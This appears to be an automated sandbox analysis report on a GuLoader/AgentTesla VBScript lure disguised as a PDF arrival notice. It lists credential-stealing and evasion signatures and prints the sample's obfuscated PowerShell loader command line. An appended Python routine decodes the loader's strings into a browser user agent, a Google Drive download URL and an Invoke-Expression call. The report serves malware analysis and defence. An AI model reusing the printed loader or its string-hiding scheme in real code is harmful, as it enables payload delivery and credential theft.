Windows Analysis Report
Arrival Notice PUS_pdf.vbs

Overview
General Information
Detection: AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification

Process Tree
- System is w10x64
- wscript.exe (PID: 7468, MD5: A47CBE969EA935BDD3AB568BB126BC80) cmdline:
  C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
- WmiPrvSE.exe (PID: 7572, MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) cmdline:
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- powershell.exe (PID: 7660) cmdline (one statement per line; the last literal is cut off in the report):
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';
  Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}
  function decoupled($Calorically){& ( $Sommerperioden) ($Calorically);}
  $Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';
  $Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';
  $Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBalieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';
  $Laservid=Banuyo17 'Mili.>.nten ';
  $Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';
  $pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';
  decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLok alnTerroiImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');
  decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv Optaibirgid
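The obfuscation in the PowerShell command line above is a character-stride scheme: every literal handed to Banuyo17 is filler text with one meaningful character at index 5, 11, 17, ... and the function rebuilds the plaintext with Substring(i, 1) while i is below Length-1. The following is an added example, not code from the report or from the sample, that ports that routine to Python, builds matching literals so the port can be tested, and pulls every `Banuyo17 '...'` argument out of a script text. The three entries in PAGE_LITERALS are copied from the command line above (re-joined from the report's wrapped column); SAMPLE_SCRIPT and its plaintexts are constructed for the demonstration and are not the sample's own strings.

```python
"""Recovering the strings hidden by the PowerShell stage's Banuyo17 routine.

Added example, not code from the report or the sample. The only scheme it
implements is the one visible in the command line above: Substring(i, 1)
taken at i = 5, 11, 17, ... while i < Length - 1, then the pieces joined.
"""
import random
import re


def stride_decode(literal: str, start: int = 5, step: int = 6) -> str:
    """Python port of Banuyo17: keep one character every `step` positions,
    beginning at `start`, while the index is below len(literal) - 1.

    The `- 1` reproduces the script's `$Kolonihaves.Length-$Klervske` bound,
    so a meaningful character sitting on the very last index is dropped.
    """
    return "".join(literal[i] for i in range(start, len(literal) - 1, step))


def stride_encode(plain: str, seed: int = 0, start: int = 5, step: int = 6) -> str:
    """Build a literal that stride_decode() maps back to `plain`.

    Constructed for testing; the sample's own generator is not on the page.
    Filler comes from a seeded RNG and never contains a single quote, so the
    result can sit inside a PowerShell '...' literal.
    """
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,;: "

    def filler(n: int) -> str:
        return "".join(rng.choice(alphabet) for _ in range(n))

    # `start` filler chars, then each real char followed by step-1 filler chars;
    # the trailing filler keeps the last real char inside the Length-1 bound.
    return filler(start) + "".join(ch + filler(step - 1) for ch in plain)


def recover_strings(script: str, decoder: str = "Banuyo17",
                    evaluator: str = "decoupled") -> dict:
    """Find every `decoder '<literal>'` call in a script and decode it.

    Returns {"vars": {name: plaintext}, "eval": [plaintext, ...]}: "vars"
    covers `$Name=Banuyo17 '...'` assignments, "eval" the
    `decoupled (Banuyo17 '...')` calls whose result the script runs via `&`.
    """
    d = re.escape(decoder)
    assign = re.compile(r"(\$\w+)\s*=\s*" + d + r"\s*'([^']*)'")
    evaluated = re.compile(re.escape(evaluator) + r"\s*\(\s*" + d + r"\s*'([^']*)'\s*\)")
    return {
        "vars": {name: stride_decode(lit) for name, lit in assign.findall(script)},
        "eval": [stride_decode(lit) for lit in evaluated.findall(script)],
    }


# Three short literals copied from the command line above (re-joined from the
# report's 10-character column); the variable names are the script's own.
PAGE_LITERALS = {
    "$Stenotaphrum": "Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ",
    "$Laservid": "Mili.>.nten ",
    "$Sommerperioden": "Ga boiFor.seForndxV ars ",
}

# A constructed script in the same shape as the sample's, with made-up plaintexts.
SAMPLE_SCRIPT = (
    "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';"
    "$Brodfrs=Banuyo17 '" + stride_encode("Mozilla/5.0 (constructed UA)", seed=1) + "';"
    "$Sommerperioden=Banuyo17 '" + stride_encode("iex", seed=2) + "';"
    "decoupled (Banuyo17 '" + stride_encode("$global:Stage=(cmd /c $Brodfrs)", seed=3) + "');"
)

if __name__ == "__main__":
    for name, lit in PAGE_LITERALS.items():
        print(f"{name} = {stride_decode(lit)!r}")
    print(recover_strings(SAMPLE_SCRIPT))
```

Run stand-alone, the block prints the three page literals decoded (`User-Agent`, `>` and `iex`, so `decoupled` is Invoke-Expression on whatever it is handed) and the strings recovered from the constructed script. Applied to the longer literals above, allowing for a few non-ASCII filler characters the report extraction dropped, the same routine gives a Firefox/121.0 user agent for `$Brodfrs`, an `https://drive.google.com/uc?export=download&id=...` URL for `$Amputationer` (later split on `>`, the value of `$Laservid`), and an `echo %appdata%\...` command for `$pseudonitrosite` that the first `decoupled` call resolves into a `$global:` variable via `cmd /c`; that is the download-from-Google-Drive-with-a-browser-user-agent behaviour the URL/domain and user-agent signatures above reflect.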